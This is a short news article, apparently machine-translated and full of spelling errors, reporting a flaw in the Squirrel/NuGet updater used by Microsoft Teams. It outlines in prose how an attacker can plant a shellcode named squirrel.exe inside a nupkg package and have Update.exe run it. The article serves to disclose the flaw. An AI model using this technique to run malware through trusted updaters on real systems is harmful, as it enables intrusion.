A malicious actor can tak advantage of the vulnerability and use Microsoft Teams to download and execute malicious packages without needing special privileges.
The Microsoft Team Platform presents a vulnerability that allows a malicious actor insert a malicious code in the app and bring an operator the posibility of execute archives in the system arbitrarily.
For those that don’t know the tool, Microsoft Teams is a communication platform that unifies multiple functionalities (chat, videospeeches, data storage and the posibility to use them in a collaborative way) that was thought for a company use or educational, because it allows to build communities or working groups that can join though an URL or by an invitation.
The error that affects Teams is Squirrel, a project with and open code that is used for instalation and updating process of the desktop app and at the same time it uses the package gestor of open code NuGet to manage data.
In this way, different security investigators revealed through the execution of an updating command an attacker can take advantage of the error to execute a code arbitrarily, explained BleepingComputer.
Oher apps that are affected by the same reason are Github, WhatsApp and UiPath, although in these cases it can only be exploited to download a payload.
In the case of Microsoft Teams, by adding a payload in the folder it executes itself by using any of the commands Update.exe or squirrel.exe.
The error wasn’t repaired yet. The investigator Richard Reegun, who was one of the ones that found out the error, reported the achievement to the Microsoft team but the company, that validated the vulnerability, postponed the patch for the next launch. And as Reegun explains in a post on his blog that he wanted to made public the finding once it was repaired, but since other investigators posted information about it he decided to make it public.
“Meanwhile, any malicious actor can lie to the update function of the app to download any malware they want using the main code of Microsoft. The attack consists in extracting any package nupkg where the attacker will insert a shellcode named as squirrel.exe”.
Once the attacker had created the suitable package he will go to the files of the app and executing the command “update.exe” the app will automatically update and will download the malicious package that contains the shellcode ti the folder “packages”, explained CBR